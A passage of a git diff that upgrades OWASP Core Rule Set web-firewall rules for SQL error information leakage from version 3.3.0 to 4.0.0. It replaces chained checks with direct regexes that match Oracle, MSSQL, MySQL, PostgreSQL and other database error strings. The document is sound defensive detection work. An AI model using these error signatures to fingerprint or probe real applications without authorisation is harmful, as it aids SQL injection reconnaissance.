"id:951012,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # # -=[ SQL Error Leakages ]=- # -# Ref: https://raw.github.com/sqlmapproject/sqlmap/master/xml/errors.xml +# Ref: https://github.com/sqlmapproject/sqlmap # Ref: https://github.com/Arachni/arachni/tree/master/components/checks/active/sql_injection/regexps # -SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \ +SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \ "id:951100,\ phase:4,\ pass,\ @@ -35,20 +36,19 @@ SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-disclosure',\ - tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.sql_error_match=1'" + ver:'OWASP_CRS/4.0.0',\ + skipAfter:END-SQL-ERROR-MATCH-PL1" -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ "id:951110,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Microsoft Access SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-msaccess',\ @@ -56,24 +56,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \ "id:951120,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Oracle SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-oracle',\ @@ -81,24 +76,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \ "id:951130,\ phase:4,\ block,\ capture,\ t:none,\ msg:'DB2 SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-db2',\ @@ -106,24 +96,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \ "id:951140,\ phase:4,\ block,\ capture,\ t:none,\ msg:'EMC SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-emc',\ @@ -131,24 +116,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ "id:951150,\ phase:4,\ block,\ capture,\ t:none,\ msg:'firebird SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-firebird',\ @@ -156,25 +136,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \ "id:951160,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Frontbase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-frontbase',\ @@ -182,24 +156,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ "id:951170,\ phase:4,\ block,\ capture,\ t:none,\ msg:'hsqldb SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-hsqldb',\ @@ -207,24 +176,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \ "id:951180,\ phase:4,\ block,\ capture,\ t:none,\ msg:'informix SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-informix',\ @@ -232,25 +196,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \ "id:951190,\ phase:4,\ block,\ capture,\ t:none,\ msg:'ingres SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-ingres',\ @@ -258,25 +216,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \ "id:951200,\ phase:4,\ block,\ capture,\ t:none,\ msg:'interbase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-interbase',\ @@ -284,24 +236,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ "id:951210,\ phase:4,\ block,\ capture,\ t:none,\ msg:'maxDB SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-maxdb',\ @@ -309,24 +256,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.|Conversion failed when converting the varchar value .*? to data type int\.)" \ "id:951220,\ phase:4,\ block,\ capture,\ t:none,\ msg:'mssql SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-mssql',\ @@ -334,24 +276,24 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/951230.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 951230 +# +SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*)MySQL|Column count doesn't match(?: value count at row)?|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax(?:;| near)|MyS(?:QL server version for the right syntax to use|qlClient\.)|\[MySQL\]\[ODBC|(?:Table '[^']+' doesn't exis|valid MySQL resul)t|Warning.{1,10}mysql_(?:[\(-\)_a-z]{1,26})?|(?:ERROR [0-9]{4} \([0-9a-z]{5}\)|XPATH syntax error):" \ "id:951230,\ phase:4,\ block,\ capture,\ t:none,\ msg:'mysql SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-mysql',\ @@ -359,24 +301,24 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/951240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 951240 +# +SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[a-z]*Error)|pg_(?:query|exec)\(\) \[:|Warning.{1,20}\bpg_.*|valid PostgreSQL result|Npgsql\.|Supplied argument is not a valid PostgreSQL .*? resource|(?:Unable to connect to PostgreSQL serv|invalid input syntax for integ)er" \ "id:951240,\ phase:4,\ block,\ capture,\ t:none,\ msg:'postgres SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-pgsql',\ @@ -384,24 +326,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:PostgreSQL query failed:|pg_query\(\) \[:|pg_exec\(\) \[:|PostgreSQL.*ERROR|Warning.*pg_.*|valid PostgreSQL result|Npgsql\.|PG::[a-zA-Z]*Error|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \ "id:951250,\ phase:4,\ block,\ capture,\ t:none,\ msg:'sqlite SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-sqlite',\ @@ -409,24 +346,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*Server message.*)" \ "id:951260,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Sybase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-sybase',\ @@ -434,38 +366,34 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.*sybase.*|Sybase.*Server message.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" +SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 770624b2c5..33fcfae4c1 100644 --- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. 